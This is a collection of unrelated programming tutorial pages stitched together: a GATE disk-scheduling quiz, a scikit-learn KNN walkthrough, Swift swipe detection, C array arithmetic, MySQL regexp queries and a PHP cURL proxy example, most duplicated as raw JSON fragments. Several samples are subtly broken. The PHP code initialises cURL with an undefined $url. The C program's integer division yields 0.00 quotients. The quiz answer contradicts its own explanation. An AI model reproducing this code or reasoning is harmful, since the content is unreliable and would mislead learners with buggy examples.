"Enter input value:\nsample1234\nwrong input" } ]
GATE | GATE-CS-2015 (Set 1) | Question 65 - GeeksforGeeks
19 Feb, 2021 Suppose the following disk request sequence (track numbers) for a disk with 100 tracks is given: 45, 20, 90, 10, 50, 60, 80, 25, 70. Assume that the initial position of the R/W head is on track 50. The additional distance that will be traversed by the R/W head when the Shortest Seek Time First (SSTF) algorithm is used compared to the SCAN (Elevator) algorithm (assuming that SCAN algorithm moves towards 100 when it starts execution) is _________ tracks(A) 8(B) 9(C) 10(D) 11Answer: (C)Explanation: In Shortest seek first (SSTF), closest request to the current position of the head, and then services that request next. In SCAN (or Elevator) algorithm, requests are serviced only in the current direction of arm movement until the arm reaches the edge of the disk. When this happens, the direction of the arm reverses, and the requests that were remaining in the opposite direction are serviced, and so on. Given a disk with 100 tracks And Sequence 45, 20, 90, 10, 50, 60, 80, 25, 70. Initial position of the R/W head is on track 50. In SSTF, requests are served as following Next Served Distance Traveled 50 0 45 5 60 15 70 10 80 10 90 10 25 65 20 5 10 10 ----------------------------------- Total Dist = 130 If Simple SCAN is used, requests are served as following Next Served Distance Traveled 50 0 60 10 70 10 80 10 90 10 45 65 [disk arm goes to 99, then to 45] 25 20 20 5 10 10 ----------------------------------- Total Dist = 140 Less Distance traveled in SSTF = 130 - 140 = 10 Therefore, it is not additional but it is less distance traversed by SSTF than SCAN. Quiz of this Question GATE-CS-2015 (Set 1) GATE-GATE-CS-2015 (Set 1) GATE Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments GATE | GATE-IT-2004 | Question 71 GATE | GATE CS 2011 | Question 7 GATE | GATE-CS-2015 (Set 3) | Question 65 GATE | GATE-CS-2016 (Set 2) | Question 48 GATE | GATE-CS-2014-(Set-3) | Question 38 GATE | GATE CS 2018 | Question 37 GATE | GATE-CS-2016 (Set 1) | Question 65 GATE | GATE-IT-2004 | Question 83 GATE | GATE-CS-2016 (Set 1) | Question 63 GATE | GATE-CS-2014-(Set-2) | Question 65
[ { "code": null, "e": 24604, "s": 24576, "text": "\n19 Feb, 2021" }, { "code": null, "e": 25226, "s": 24604, "text": "Suppose the following disk request sequence (track numbers) for a disk with 100 tracks is given: 45, 20, 90, 10, 50, 60, 80, 25, 70. Assume that the initial position of the R/W head is on track 50. The additional distance that will be traversed by the R/W head when the Shortest Seek Time First (SSTF) algorithm is used compared to the SCAN (Elevator) algorithm (assuming that SCAN algorithm moves towards 100 when it starts execution) is _________ tracks(A) 8(B) 9(C) 10(D) 11Answer: (C)Explanation: In Shortest seek first (SSTF), closest request to the current position of the head, and then services that request next." }, { "code": null, "e": 25513, "s": 25226, "text": "In SCAN (or Elevator) algorithm, requests are serviced only in the current direction of arm movement until the arm reaches the edge of the disk. When this happens, the direction of the arm reverses, and the requests that were remaining in the opposite direction are serviced, and so on." }, { "code": null, "e": 26515, "s": 25513, "text": "Given a disk with 100 tracks \n\nAnd Sequence 45, 20, 90, 10, 50, 60, 80, 25, 70.\n\nInitial position of the R/W head is on track 50.\n\nIn SSTF, requests are served as following\n\nNext Served Distance Traveled\n 50 0\n 45 5\n 60 15 \n 70 10 \n 80 10 \n 90 10\n 25 65 \n 20 5 \n 10 10\n----------------------------------- \nTotal Dist = 130\n\n\nIf Simple SCAN is used, requests are served as following\n\nNext Served Distance Traveled\n 50 0\n 60 10 \n 70 10 \n 80 10 \n 90 10\n 45 65 [disk arm goes to 99, then to 45]\n 25 20 \n 20 5 \n 10 10\n----------------------------------- \nTotal Dist = 140\n\n\nLess Distance traveled in SSTF = 130 - 140 = 10 " }, { "code": null, "e": 26600, "s": 26515, "text": "Therefore, it is not additional but it is less distance traversed by SSTF than SCAN." }, { "code": null, "e": 26622, "s": 26600, "text": "Quiz of this Question" }, { "code": null, "e": 26643, "s": 26622, "text": "GATE-CS-2015 (Set 1)" }, { "code": null, "e": 26669, "s": 26643, "text": "GATE-GATE-CS-2015 (Set 1)" }, { "code": null, "e": 26674, "s": 26669, "text": "GATE" }, { "code": null, "e": 26772, "s": 26674, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 26781, "s": 26772, "text": "Comments" }, { "code": null, "e": 26794, "s": 26781, "text": "Old Comments" }, { "code": null, "e": 26828, "s": 26794, "text": "GATE | GATE-IT-2004 | Question 71" }, { "code": null, "e": 26861, "s": 26828, "text": "GATE | GATE CS 2011 | Question 7" }, { "code": null, "e": 26903, "s": 26861, "text": "GATE | GATE-CS-2015 (Set 3) | Question 65" }, { "code": null, "e": 26945, "s": 26903, "text": "GATE | GATE-CS-2016 (Set 2) | Question 48" }, { "code": null, "e": 26987, "s": 26945, "text": "GATE | GATE-CS-2014-(Set-3) | Question 38" }, { "code": null, "e": 27021, "s": 26987, "text": "GATE | GATE CS 2018 | Question 37" }, { "code": null, "e": 27063, "s": 27021, "text": "GATE | GATE-CS-2016 (Set 1) | Question 65" }, { "code": null, "e": 27097, "s": 27063, "text": "GATE | GATE-IT-2004 | Question 83" }, { "code": null, "e": 27139, "s": 27097, "text": "GATE | GATE-CS-2016 (Set 1) | Question 63" } ]
ML | Implementation of KNN classifier using Sklearn - GeeksforGeeks
28 Nov, 2019 Prerequisite: K-Nearest Neighbours Algorithm K-Nearest Neighbors is one of the most basic yet essential classification algorithms in Machine Learning. It belongs to the supervised learning domain and finds intense application in pattern recognition, data mining and intrusion detection. It is widely disposable in real-life scenarios since it is non-parametric, meaning, it does not make any underlying assumptions about the distribution of data (as opposed to other algorithms such as GMM, which assume a Gaussian distribution of the given data). This article will demonstrate how to implement the K-Nearest neighbors classifier algorithm using Sklearn library of Python. Step 1: Importing the required Libraries import numpy as npimport pandas as pdfrom sklearn.model_selection import train_test_splitfrom sklearn.neighbors import KNeighborsClassifierimport matplotlib.pyplot as plt import seaborn as sns Step 2: Reading the Dataset cd C:\Users\Dev\Desktop\Kaggle\Breast_Cancer# Changing the read file location to the location of the file df = pd.read_csv('data.csv') y = df['diagnosis']X = df.drop('diagnosis', axis = 1)X = X.drop('Unnamed: 32', axis = 1)X = X.drop('id', axis = 1)# Separating the dependent and independent variable X_train, X_test, y_train, y_test = train_test_split( X, y, test_size = 0.3, random_state = 0)# Splitting the data into training and testing data Step 3: Training the model K = []training = []test = []scores = {} for k in range(2, 21): clf = KNeighborsClassifier(n_neighbors = k) clf.fit(X_train, y_train) training_score = clf.score(X_train, y_train) test_score = clf.score(X_test, y_test) K.append(k) training.append(training_score) test.append(test_score) scores[k] = [training_score, test_score] Step 4: Evaluating the model for keys, values in scores.items(): print(keys, ':', values) We now try to find the optimum value for ‘k’ ie the number of nearest neighbors. Step 5: Plotting the training and test scores graph ax = sns.stripplot(K, training);ax.set(xlabel ='values of k', ylabel ='Training Score') plt.show()# function to show plot ax = sns.stripplot(K, test);ax.set(xlabel ='values of k', ylabel ='Test Score')plt.show() plt.scatter(K, training, color ='k')plt.scatter(K, test, color ='g')plt.show()# For overlapping scatter plots From the above scatter plot, we can come to the conclusion that the optimum value of k will be around 5. shubham_singh Machine Learning Python Machine Learning Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Support Vector Machine Algorithm k-nearest neighbor algorithm in Python Singular Value Decomposition (SVD) Difference between Informed and Uninformed Search in AI Normalization vs Standardization Read JSON file using Python Adding new column to existing DataFrame in Pandas Python map() function How to get column names in Pandas dataframe
[ { "code": null, "e": 24344, "s": 24316, "text": "\n28 Nov, 2019" }, { "code": null, "e": 24389, "s": 24344, "text": "Prerequisite: K-Nearest Neighbours Algorithm" }, { "code": null, "e": 24892, "s": 24389, "text": "K-Nearest Neighbors is one of the most basic yet essential classification algorithms in Machine Learning. It belongs to the supervised learning domain and finds intense application in pattern recognition, data mining and intrusion detection. It is widely disposable in real-life scenarios since it is non-parametric, meaning, it does not make any underlying assumptions about the distribution of data (as opposed to other algorithms such as GMM, which assume a Gaussian distribution of the given data)." }, { "code": null, "e": 25017, "s": 24892, "text": "This article will demonstrate how to implement the K-Nearest neighbors classifier algorithm using Sklearn library of Python." }, { "code": null, "e": 25058, "s": 25017, "text": "Step 1: Importing the required Libraries" }, { "code": "import numpy as npimport pandas as pdfrom sklearn.model_selection import train_test_splitfrom sklearn.neighbors import KNeighborsClassifierimport matplotlib.pyplot as plt import seaborn as sns", "e": 25251, "s": 25058, "text": null }, { "code": null, "e": 25280, "s": 25251, "text": " Step 2: Reading the Dataset" }, { "code": "cd C:\\Users\\Dev\\Desktop\\Kaggle\\Breast_Cancer# Changing the read file location to the location of the file df = pd.read_csv('data.csv') y = df['diagnosis']X = df.drop('diagnosis', axis = 1)X = X.drop('Unnamed: 32', axis = 1)X = X.drop('id', axis = 1)# Separating the dependent and independent variable X_train, X_test, y_train, y_test = train_test_split( X, y, test_size = 0.3, random_state = 0)# Splitting the data into training and testing data", "e": 25741, "s": 25280, "text": null }, { "code": null, "e": 25769, "s": 25741, "text": " Step 3: Training the model" }, { "code": "K = []training = []test = []scores = {} for k in range(2, 21): clf = KNeighborsClassifier(n_neighbors = k) clf.fit(X_train, y_train) training_score = clf.score(X_train, y_train) test_score = clf.score(X_test, y_test) K.append(k) training.append(training_score) test.append(test_score) scores[k] = [training_score, test_score]", "e": 26124, "s": 25769, "text": null }, { "code": null, "e": 26154, "s": 26124, "text": " Step 4: Evaluating the model" }, { "code": "for keys, values in scores.items(): print(keys, ':', values)", "e": 26218, "s": 26154, "text": null }, { "code": null, "e": 26300, "s": 26218, "text": " We now try to find the optimum value for ‘k’ ie the number of nearest neighbors." }, { "code": null, "e": 26352, "s": 26300, "text": "Step 5: Plotting the training and test scores graph" }, { "code": "ax = sns.stripplot(K, training);ax.set(xlabel ='values of k', ylabel ='Training Score') plt.show()# function to show plot", "e": 26477, "s": 26352, "text": null }, { "code": "ax = sns.stripplot(K, test);ax.set(xlabel ='values of k', ylabel ='Test Score')plt.show()", "e": 26567, "s": 26477, "text": null }, { "code": "plt.scatter(K, training, color ='k')plt.scatter(K, test, color ='g')plt.show()# For overlapping scatter plots", "e": 26677, "s": 26567, "text": null }, { "code": null, "e": 26782, "s": 26677, "text": "From the above scatter plot, we can come to the conclusion that the optimum value of k will be around 5." }, { "code": null, "e": 26796, "s": 26782, "text": "shubham_singh" }, { "code": null, "e": 26813, "s": 26796, "text": "Machine Learning" }, { "code": null, "e": 26820, "s": 26813, "text": "Python" }, { "code": null, "e": 26837, "s": 26820, "text": "Machine Learning" }, { "code": null, "e": 26935, "s": 26837, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 26944, "s": 26935, "text": "Comments" }, { "code": null, "e": 26957, "s": 26944, "text": "Old Comments" }, { "code": null, "e": 26990, "s": 26957, "text": "Support Vector Machine Algorithm" }, { "code": null, "e": 27029, "s": 26990, "text": "k-nearest neighbor algorithm in Python" }, { "code": null, "e": 27064, "s": 27029, "text": "Singular Value Decomposition (SVD)" }, { "code": null, "e": 27120, "s": 27064, "text": "Difference between Informed and Uninformed Search in AI" }, { "code": null, "e": 27153, "s": 27120, "text": "Normalization vs Standardization" }, { "code": null, "e": 27181, "s": 27153, "text": "Read JSON file using Python" }, { "code": null, "e": 27231, "s": 27181, "text": "Adding new column to existing DataFrame in Pandas" }, { "code": null, "e": 27253, "s": 27231, "text": "Python map() function" } ]
How to detect swipe vertically on a ScrollView using Swift?
To detect swipe in scrollView we will need to make use of some tricks as scroll view does not natively give the directions of scroll made on it. We’ll see this with help of an example. Create an empty project, add scroll view to the view as per your requirement. Give them constraint as required in the application. From the object library, drag and drop a swipe gesture recognizer right above the Scroll View. Select the gesture recognizer, go to its attribute inspector and from there, select the swipe option and set the value as “up”. When you do this, now your gesture recognizer can recognize up swipes only. Now you need to create a method for this swipe gesture. @IBAction func swipeMade(_ sender: UISwipeGestureRecognizer) { if sender.direction == .up { print("up swipe made") // perform actions here. } } When you write this code, the recognizer sends events to this method, and if the swipe direction is up, it will come inside the if block. You can perform your desired operation here. When we run this code on a device and make a swipe, below is the result that’s produced on the console.
[ { "code": null, "e": 1247, "s": 1062, "text": "To detect swipe in scrollView we will need to make use of some tricks as scroll view does not natively give the directions of scroll made on it. We’ll see this with help of an example." }, { "code": null, "e": 1325, "s": 1247, "text": "Create an empty project, add scroll view to the view as per your requirement." }, { "code": null, "e": 1378, "s": 1325, "text": "Give them constraint as required in the application." }, { "code": null, "e": 1473, "s": 1378, "text": "From the object library, drag and drop a swipe gesture recognizer right above the Scroll View." }, { "code": null, "e": 1601, "s": 1473, "text": "Select the gesture recognizer, go to its attribute inspector and from there, select the swipe option and set the value as “up”." }, { "code": null, "e": 1733, "s": 1601, "text": "When you do this, now your gesture recognizer can recognize up swipes only. Now you need to create a method for this swipe gesture." }, { "code": null, "e": 1895, "s": 1733, "text": "@IBAction func swipeMade(_ sender: UISwipeGestureRecognizer) {\n if sender.direction == .up {\n print(\"up swipe made\")\n // perform actions here.\n }\n}" }, { "code": null, "e": 2078, "s": 1895, "text": "When you write this code, the recognizer sends events to this method, and if the swipe direction is up, it will come inside the if block. You can perform your desired operation here." }, { "code": null, "e": 2182, "s": 2078, "text": "When we run this code on a device and make a swipe, below is the result that’s produced on the console." } ]
How to perform the arithmetic operations on arrays in C language?
An array is a group of related data items that are stored with single name. For example, int student[30]; //student is an array name that holds 30 collection of data items with a single variable name Searching − It is used to find whether particular element is present or not Searching − It is used to find whether particular element is present or not Sorting − It helps in arranging the elements in an array either in ascending or descending order. Sorting − It helps in arranging the elements in an array either in ascending or descending order. Traversing − It processes every element in an array sequentially. Traversing − It processes every element in an array sequentially. Inserting − It helps in inserting the elements in an array. Inserting − It helps in inserting the elements in an array. Deleting − It helps in deleting an element in an array. Deleting − It helps in deleting an element in an array. The logic to perform all arithmetic operations in an array is as follows − for(i = 0; i < size; i ++){ add [i]= A[i] + B[i]; sub [i]= A[i] - B[i]; mul [i]= A[i] * B[i]; div [i] = A[i] / B[i]; mod [i] = A[i] % B[i]; } Following is the C program for arithmetic operations on arrays − Live Demo #include<stdio.h> int main(){ int size, i, A[50], B[50]; int add[10], sub[10], mul[10], mod[10]; float div[10]; printf("enter array size:\n"); scanf("%d", &size); printf("enter elements of 1st array:\n"); for(i = 0; i < size; i++){ scanf("%d", &A[i]); } printf("enter the elements of 2nd array:\n"); for(i = 0; i < size; i ++){ scanf("%d", &B[i]); } for(i = 0; i < size; i ++){ add [i]= A[i] + B[i]; sub [i]= A[i] - B[i]; mul [i]= A[i] * B[i]; div [i] = A[i] / B[i]; mod [i] = A[i] % B[i]; } printf("\n add\t sub\t Mul\t Div\t Mod\n"); printf("------------------------------------\n"); for(i = 0; i <size; i++){ printf("\n%d\t ", add[i]); printf("%d \t ", sub[i]); printf("%d \t ", mul[i]); printf("%.2f\t ", div[i]); printf("%d \t ", mod[i]); } return 0; } When the above program is executed, it produces the following result − Run 1: enter array size: 2 enter elements of 1st array: 23 45 enter the elements of 2nd array: 67 89 add sub Mul Div Mod ------------------------------------ 90 -44 1541 0.00 23 134 -44 4005 0.00 45 Run 2: enter array size: 4 enter elements of 1st array: 89 23 12 56 enter the elements of 2nd array: 2 4 7 8 add sub Mul Div Mod ------------------------------------ 91 87 178 44.00 1 27 19 92 5.00 3 19 5 84 1.00 5 64 48 448 7.00 0
[ { "code": null, "e": 1138, "s": 1062, "text": "An array is a group of related data items that are stored with single name." }, { "code": null, "e": 1262, "s": 1138, "text": "For example, int student[30]; //student is an array name that holds 30 collection of data items with a single variable name" }, { "code": null, "e": 1338, "s": 1262, "text": "Searching − It is used to find whether particular element is present or not" }, { "code": null, "e": 1414, "s": 1338, "text": "Searching − It is used to find whether particular element is present or not" }, { "code": null, "e": 1512, "s": 1414, "text": "Sorting − It helps in arranging the elements in an array either in ascending or descending order." }, { "code": null, "e": 1610, "s": 1512, "text": "Sorting − It helps in arranging the elements in an array either in ascending or descending order." }, { "code": null, "e": 1676, "s": 1610, "text": "Traversing − It processes every element in an array sequentially." }, { "code": null, "e": 1742, "s": 1676, "text": "Traversing − It processes every element in an array sequentially." }, { "code": null, "e": 1802, "s": 1742, "text": "Inserting − It helps in inserting the elements in an array." }, { "code": null, "e": 1862, "s": 1802, "text": "Inserting − It helps in inserting the elements in an array." }, { "code": null, "e": 1918, "s": 1862, "text": "Deleting − It helps in deleting an element in an array." }, { "code": null, "e": 1974, "s": 1918, "text": "Deleting − It helps in deleting an element in an array." }, { "code": null, "e": 2049, "s": 1974, "text": "The logic to perform all arithmetic operations in an array is as follows −" }, { "code": null, "e": 2206, "s": 2049, "text": "for(i = 0; i < size; i ++){\n add [i]= A[i] + B[i];\n sub [i]= A[i] - B[i];\n mul [i]= A[i] * B[i];\n div [i] = A[i] / B[i];\n mod [i] = A[i] % B[i];\n}" }, { "code": null, "e": 2271, "s": 2206, "text": "Following is the C program for arithmetic operations on arrays −" }, { "code": null, "e": 2282, "s": 2271, "text": " Live Demo" }, { "code": null, "e": 3166, "s": 2282, "text": "#include<stdio.h>\nint main(){\n int size, i, A[50], B[50];\n int add[10], sub[10], mul[10], mod[10];\n float div[10];\n printf(\"enter array size:\\n\");\n scanf(\"%d\", &size);\n printf(\"enter elements of 1st array:\\n\");\n for(i = 0; i < size; i++){\n scanf(\"%d\", &A[i]);\n }\n printf(\"enter the elements of 2nd array:\\n\");\n for(i = 0; i < size; i ++){\n scanf(\"%d\", &B[i]);\n }\n for(i = 0; i < size; i ++){\n add [i]= A[i] + B[i];\n sub [i]= A[i] - B[i];\n mul [i]= A[i] * B[i];\n div [i] = A[i] / B[i];\n mod [i] = A[i] % B[i];\n }\n printf(\"\\n add\\t sub\\t Mul\\t Div\\t Mod\\n\");\n printf(\"------------------------------------\\n\");\n for(i = 0; i <size; i++){\n printf(\"\\n%d\\t \", add[i]);\n printf(\"%d \\t \", sub[i]);\n printf(\"%d \\t \", mul[i]);\n printf(\"%.2f\\t \", div[i]);\n printf(\"%d \\t \", mod[i]);\n }\n return 0;\n}" }, { "code": null, "e": 3237, "s": 3166, "text": "When the above program is executed, it produces the following result −" }, { "code": null, "e": 3734, "s": 3237, "text": "Run 1:\nenter array size:\n2\nenter elements of 1st array:\n23\n45\nenter the elements of 2nd array:\n67\n89\nadd sub Mul Div Mod\n------------------------------------\n90 -44 1541 0.00 23\n134 -44 4005 0.00 45\nRun 2:\nenter array size:\n4\nenter elements of 1st array:\n89\n23\n12\n56\nenter the elements of 2nd array:\n2\n4\n7\n8\nadd sub Mul Div Mod\n------------------------------------\n91 87 178 44.00 1\n27 19 92 5.00 3\n19 5 84 1.00 5\n64 48 448 7.00 0" } ]
How to use cURL via a proxy ? - GeeksforGeeks
01 Sep, 2020 This tutorial will show the way to use a proxy with PHP’s cURL functions. In this tutorial, we’ll send our HTTP request via a selected proxy IP address and port. Why should you use a proxy?There are various reasons why you would possibly want to use a proxy with cURL: To get around regional filters and country blocks.Using a proxy IP addresses allows you to mask or hide your own IP address.To debug network connection issues. To get around regional filters and country blocks. Using a proxy IP addresses allows you to mask or hide your own IP address. To debug network connection issues. Using a proxy with PHP’s cURL functions: To authenticate with a proxy via cURL and send a HTTP GET request follow along code given below and read the instructions specified as comments. Note: All the credentials and links used are random and used for demo purpose only. Please use your own proxy, credentials and URL. <?php // Initialize URL you that want to// send a cURL proxy request to.$desturl = 'http://example.net'; // The IP address of the proxy that// you want to send your request// through$proxyipadd = '11.22.33.44'; // The port that the proxy is// listening on$proxyport = '1234'; // The username for authenticating// with the proxy$proxyuserid = 'testuser'; // The password for authenticating// with the proxy$proxypass = 'testpass'; // Initialize curl $ci = curl_init($url); // Set curl attributescurl_setopt($ci, CURLOPT_RETURNTRANSFER, true);curl_setopt($ci, CURLOPT_FOLLOWLOCATION, true);curl_setopt($ci, CURLOPT_HTTPPROXYTUNNEL , 1); // Set the proxy IPcurl_setopt($ci, CURLOPT_PROXY, $proxyipadd); // Set the portcurl_setopt($ci, CURLOPT_PROXYPORT, $proxyport); // Set the username and passwordcurl_setopt($ci, CURLOPT_PROXYUSERPWD, "$proxyuserid:$proxypass"); // Execute the request$result = curl_exec($ci); // Check if any errorsif(curl_errno($ci)){ throw new Exception(curl_error($ci));} // Print the result.echo $result;?> In the above code, we connected to a proxy that needs authentication before sending an easy GET request. If the proxy doesn’t require authentication, then you could omit the CURLOPT_PROXYUSERPWD line from your code. Some errors you might encounter while using curl: “Failed to attach to 11.22.33.44 port 1234: Timed out” This means that cURL couldn’t hook up with the proxy IP address and port used. Make sure that both the IP and port are correct and also check if the proxy is working correctly. “Failed to attach to 11.22.33.44 port 1234: Connection refused” This error usually occurs once you have specified an incorrect port number i.e. the IP address of the proxy was correct, but it’s not listening for requests on specified port. There is also the likelihood that the server is up, but the software that runs the proxy isn’t running. “Received HTTP code 407 from proxy after CONNECT” The username and password combo that you simply are using with CURLOPT_PROXYUSERPWD is wrong. Make sure that username and password are correct and you are separating the username and password by a colon : character. PHP-Misc PHP PHP Programs Web Technologies Web technologies Questions PHP Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments How to fetch data from localserver database and display on HTML table using PHP ? Different ways for passing data to view in Laravel How to create admin login page using PHP? Create a drop-down list that options fetched from a MySQL database in PHP How to pass form variables from one page to other page in PHP ? How to call PHP function on the click of a Button ? How to fetch data from localserver database and display on HTML table using PHP ? How to create admin login page using PHP? How to calculate the difference between two dates in PHP ? How to pass form variables from one page to other page in PHP ?
[ { "code": null, "e": 24581, "s": 24553, "text": "\n01 Sep, 2020" }, { "code": null, "e": 24743, "s": 24581, "text": "This tutorial will show the way to use a proxy with PHP’s cURL functions. In this tutorial, we’ll send our HTTP request via a selected proxy IP address and port." }, { "code": null, "e": 24850, "s": 24743, "text": "Why should you use a proxy?There are various reasons why you would possibly want to use a proxy with cURL:" }, { "code": null, "e": 25010, "s": 24850, "text": "To get around regional filters and country blocks.Using a proxy IP addresses allows you to mask or hide your own IP address.To debug network connection issues." }, { "code": null, "e": 25061, "s": 25010, "text": "To get around regional filters and country blocks." }, { "code": null, "e": 25136, "s": 25061, "text": "Using a proxy IP addresses allows you to mask or hide your own IP address." }, { "code": null, "e": 25172, "s": 25136, "text": "To debug network connection issues." }, { "code": null, "e": 25358, "s": 25172, "text": "Using a proxy with PHP’s cURL functions: To authenticate with a proxy via cURL and send a HTTP GET request follow along code given below and read the instructions specified as comments." }, { "code": null, "e": 25490, "s": 25358, "text": "Note: All the credentials and links used are random and used for demo purpose only. Please use your own proxy, credentials and URL." }, { "code": "<?php // Initialize URL you that want to// send a cURL proxy request to.$desturl = 'http://example.net'; // The IP address of the proxy that// you want to send your request// through$proxyipadd = '11.22.33.44'; // The port that the proxy is// listening on$proxyport = '1234'; // The username for authenticating// with the proxy$proxyuserid = 'testuser'; // The password for authenticating// with the proxy$proxypass = 'testpass'; // Initialize curl $ci = curl_init($url); // Set curl attributescurl_setopt($ci, CURLOPT_RETURNTRANSFER, true);curl_setopt($ci, CURLOPT_FOLLOWLOCATION, true);curl_setopt($ci, CURLOPT_HTTPPROXYTUNNEL , 1); // Set the proxy IPcurl_setopt($ci, CURLOPT_PROXY, $proxyipadd); // Set the portcurl_setopt($ci, CURLOPT_PROXYPORT, $proxyport); // Set the username and passwordcurl_setopt($ci, CURLOPT_PROXYUSERPWD, \"$proxyuserid:$proxypass\"); // Execute the request$result = curl_exec($ci); // Check if any errorsif(curl_errno($ci)){ throw new Exception(curl_error($ci));} // Print the result.echo $result;?>", "e": 26547, "s": 25490, "text": null }, { "code": null, "e": 26763, "s": 26547, "text": "In the above code, we connected to a proxy that needs authentication before sending an easy GET request. If the proxy doesn’t require authentication, then you could omit the CURLOPT_PROXYUSERPWD line from your code." }, { "code": null, "e": 26813, "s": 26763, "text": "Some errors you might encounter while using curl:" }, { "code": null, "e": 27045, "s": 26813, "text": "“Failed to attach to 11.22.33.44 port 1234: Timed out” This means that cURL couldn’t hook up with the proxy IP address and port used. Make sure that both the IP and port are correct and also check if the proxy is working correctly." }, { "code": null, "e": 27389, "s": 27045, "text": "“Failed to attach to 11.22.33.44 port 1234: Connection refused” This error usually occurs once you have specified an incorrect port number i.e. the IP address of the proxy was correct, but it’s not listening for requests on specified port. There is also the likelihood that the server is up, but the software that runs the proxy isn’t running." }, { "code": null, "e": 27655, "s": 27389, "text": "“Received HTTP code 407 from proxy after CONNECT” The username and password combo that you simply are using with CURLOPT_PROXYUSERPWD is wrong. Make sure that username and password are correct and you are separating the username and password by a colon : character." }, { "code": null, "e": 27664, "s": 27655, "text": "PHP-Misc" }, { "code": null, "e": 27668, "s": 27664, "text": "PHP" }, { "code": null, "e": 27681, "s": 27668, "text": "PHP Programs" }, { "code": null, "e": 27698, "s": 27681, "text": "Web Technologies" }, { "code": null, "e": 27725, "s": 27698, "text": "Web technologies Questions" }, { "code": null, "e": 27729, "s": 27725, "text": "PHP" }, { "code": null, "e": 27827, "s": 27729, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 27836, "s": 27827, "text": "Comments" }, { "code": null, "e": 27849, "s": 27836, "text": "Old Comments" }, { "code": null, "e": 27931, "s": 27849, "text": "How to fetch data from localserver database and display on HTML table using PHP ?" }, { "code": null, "e": 27982, "s": 27931, "text": "Different ways for passing data to view in Laravel" }, { "code": null, "e": 28024, "s": 27982, "text": "How to create admin login page using PHP?" }, { "code": null, "e": 28098, "s": 28024, "text": "Create a drop-down list that options fetched from a MySQL database in PHP" }, { "code": null, "e": 28162, "s": 28098, "text": "How to pass form variables from one page to other page in PHP ?" }, { "code": null, "e": 28214, "s": 28162, "text": "How to call PHP function on the click of a Button ?" }, { "code": null, "e": 28296, "s": 28214, "text": "How to fetch data from localserver database and display on HTML table using PHP ?" }, { "code": null, "e": 28338, "s": 28296, "text": "How to create admin login page using PHP?" }, { "code": null, "e": 28397, "s": 28338, "text": "How to calculate the difference between two dates in PHP ?" } ]
How to check the column values have string or digits in MySQL?
If you want only the string values, then use the below syntax − select *from yourTableName where yourColumnName NOT regexp '^[0-9]+$'; If you want only the digit, then use the below syntax − select *from yourTableName where yourColumnName regexp '^[0-9]+$'; Let us first create a table − mysql> create table DemoTable( Id varchar(100) ); Query OK, 0 rows affected (0.49 sec) Insert some records in the table using insert command − mysql> insert into DemoTable values('1000'); Query OK, 1 row affected (0.16 sec) mysql> insert into DemoTable values('John'); Query OK, 1 row affected (0.10 sec) mysql> insert into DemoTable values('Carol_Smith'); Query OK, 1 row affected (0.15 sec) mysql> insert into DemoTable values('2000'); Query OK, 1 row affected (0.10 sec) Display all records from the table using select statement − mysql> select *from DemoTable; This will produce the following output − +-------------+ | Id | +-------------+ | 1000 | | John | | Carol_Smith | | 2000 | +-------------+ 4 rows in set (0.00 sec) CASE 1 − Following is the query to get only the string value − mysql> select *from DemoTable where Id NOT regexp '^[0-9]+$'; This will produce the following output displaying only the string column values − +-------------+ | Id | +-------------+ | John | | Carol_Smith | +-------------+ 2 rows in set (0.00 sec) CASE 2 − Following is the query to get only the digits − mysql> select *from DemoTable where Id regexp '^[0-9]+$'; This will produce the following output displaying only the digit column values − +------+ | Id | +------+ | 1000 | | 2000 | +------+ 2 rows in set (0.00 sec)
[ { "code": null, "e": 1126, "s": 1062, "text": "If you want only the string values, then use the below syntax −" }, { "code": null, "e": 1197, "s": 1126, "text": "select *from yourTableName where yourColumnName NOT regexp '^[0-9]+$';" }, { "code": null, "e": 1253, "s": 1197, "text": "If you want only the digit, then use the below syntax −" }, { "code": null, "e": 1320, "s": 1253, "text": "select *from yourTableName where yourColumnName regexp '^[0-9]+$';" }, { "code": null, "e": 1350, "s": 1320, "text": "Let us first create a table −" }, { "code": null, "e": 1440, "s": 1350, "text": "mysql> create table DemoTable(\n Id varchar(100)\n);\nQuery OK, 0 rows affected (0.49 sec)" }, { "code": null, "e": 1496, "s": 1440, "text": "Insert some records in the table using insert command −" }, { "code": null, "e": 1827, "s": 1496, "text": "mysql> insert into DemoTable values('1000');\nQuery OK, 1 row affected (0.16 sec)\nmysql> insert into DemoTable values('John');\nQuery OK, 1 row affected (0.10 sec)\nmysql> insert into DemoTable values('Carol_Smith');\nQuery OK, 1 row affected (0.15 sec)\nmysql> insert into DemoTable values('2000');\nQuery OK, 1 row affected (0.10 sec)" }, { "code": null, "e": 1887, "s": 1827, "text": "Display all records from the table using select statement −" }, { "code": null, "e": 1918, "s": 1887, "text": "mysql> select *from DemoTable;" }, { "code": null, "e": 1959, "s": 1918, "text": "This will produce the following output −" }, { "code": null, "e": 2112, "s": 1959, "text": "+-------------+\n| Id |\n+-------------+\n| 1000 |\n| John |\n| Carol_Smith |\n| 2000 |\n+-------------+\n4 rows in set (0.00 sec)" }, { "code": null, "e": 2175, "s": 2112, "text": "CASE 1 − Following is the query to get only the string value −" }, { "code": null, "e": 2237, "s": 2175, "text": "mysql> select *from DemoTable where Id NOT regexp '^[0-9]+$';" }, { "code": null, "e": 2319, "s": 2237, "text": "This will produce the following output displaying only the string column values −" }, { "code": null, "e": 2440, "s": 2319, "text": "+-------------+\n| Id |\n+-------------+\n| John |\n| Carol_Smith |\n+-------------+\n2 rows in set (0.00 sec)" }, { "code": null, "e": 2497, "s": 2440, "text": "CASE 2 − Following is the query to get only the digits −" }, { "code": null, "e": 2555, "s": 2497, "text": "mysql> select *from DemoTable where Id regexp '^[0-9]+$';" }, { "code": null, "e": 2636, "s": 2555, "text": "This will produce the following output displaying only the digit column values −" }, { "code": null, "e": 2715, "s": 2636, "text": "+------+\n| Id |\n+------+\n| 1000 |\n| 2000 |\n+------+\n2 rows in set (0.00 sec)" } ]
C++ program to print Happy Birthday
